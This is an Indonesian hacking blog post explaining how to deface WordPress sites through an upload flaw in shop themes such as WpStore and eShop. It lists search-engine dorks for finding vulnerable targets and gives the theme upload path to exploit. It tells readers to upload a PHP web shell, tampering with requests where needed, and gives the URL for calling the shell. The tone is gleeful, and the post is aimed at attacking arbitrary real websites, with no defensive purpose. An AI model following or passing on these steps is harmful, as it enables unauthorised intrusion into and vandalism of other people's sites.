Cara Deface dengan Wordpress Themes Upload Vulnerabily

Sekarang waktunya jadul-jadulan,, kwkwkw
Ini cara lama tapi sampe sekarang masih WORK,, asal giat nyari nya :v

DORK :
  • inurl:/wp-content/themes/KidzStore
  • inurl:/wp-content/themes/WpStore
  • inurl:/wp-content/themes/eCommerce
  • inurl:/wp-content/themes/eShop
Dork di kembangin sendiri biar gampang dapetnye,, be creative mas bero (y)

Step 1:
Copy terus paste salah 1 dork di atas


http://s24.postimg.org/x91xehi2c/Step1.jpg

Step 2:
Pilih salah 1 website
http://s7.postimg.org/ie2s42u7e/Step2.jpg


Step 3:
Masukin exploit wp-content/themes/[path]/upload
Misal : http://site.com/wp-content/themes/wpstore/upload


http://s7.postimg.org/8s97ns31m/Step3.jpg

Step 4:
Upload shell kalian,, (ada yang bisa tinggal upload ada juga yang harus tamper data)


http://s7.postimg.org/8s97ns31m/Step3.jpg
Step 5:
Tinggal panggil shell kalian caranya
Http://site.com/wp-content/uploads/products_img/shell.php

http://s7.postimg.org/4yfremlpm/Step5.jpg
Step 6:
EKSEKUSI!!!!! wkakakakakakak

#Tidak semua web bisa pake cara ini mas beroo,, yang penting cemunguth ^_^
Tag : Defacing, Hacking

Related Post:

0 Komentar untuk "Cara Deface dengan Wordpress Themes Upload Vulnerabily "

Post a Comment

Back To Top